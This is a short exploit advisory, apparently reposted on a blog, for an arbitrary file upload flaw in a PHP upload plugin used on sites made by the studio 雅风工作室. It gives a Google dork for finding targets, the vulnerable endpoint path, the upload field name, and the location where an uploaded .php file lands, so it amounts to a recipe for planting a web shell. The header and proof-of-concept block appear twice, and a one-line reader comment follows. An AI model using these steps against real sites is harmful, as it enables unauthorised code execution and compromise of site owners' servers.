雅风工作室 - Arbitrary File Upload
# Exploit Title: 雅风工作室 - Arbitrary File Upload
# Google Dork: intext:"Htmcss.Com All Rights Reserved"
# Date: 30 December 2017
# Exploit Author: AlHikam0x
# Vendor Homepage: http://www.htmcss.com
# Tested on: Ubuntu
Proof of Concept
1. Check Vulnerability. https://web-target/tpl/plugins/upload9.1.0/server/php/
2. Array type Upload : files[]
3. Check file uploaded. https://web-target/tpl/plugins/upload9.1.0/server/php/files/1234567_.php
# Google Dork: intext:"Htmcss.Com All Rights Reserved"
# Date: 30 December 2017
# Exploit Author: AlHikam0x
# Vendor Homepage: http://www.htmcss.com
# Tested on: Ubuntu
Proof of Concept
1. Check Vulnerability. https://web-target/tpl/plugins/upload9.1.0/server/php/
2. Array type Upload : files[]
3. Check file uploaded. https://web-target/tpl/plugins/upload9.1.0/server/php/files/1234567_.php
CRSF nya mana?
ReplyDelete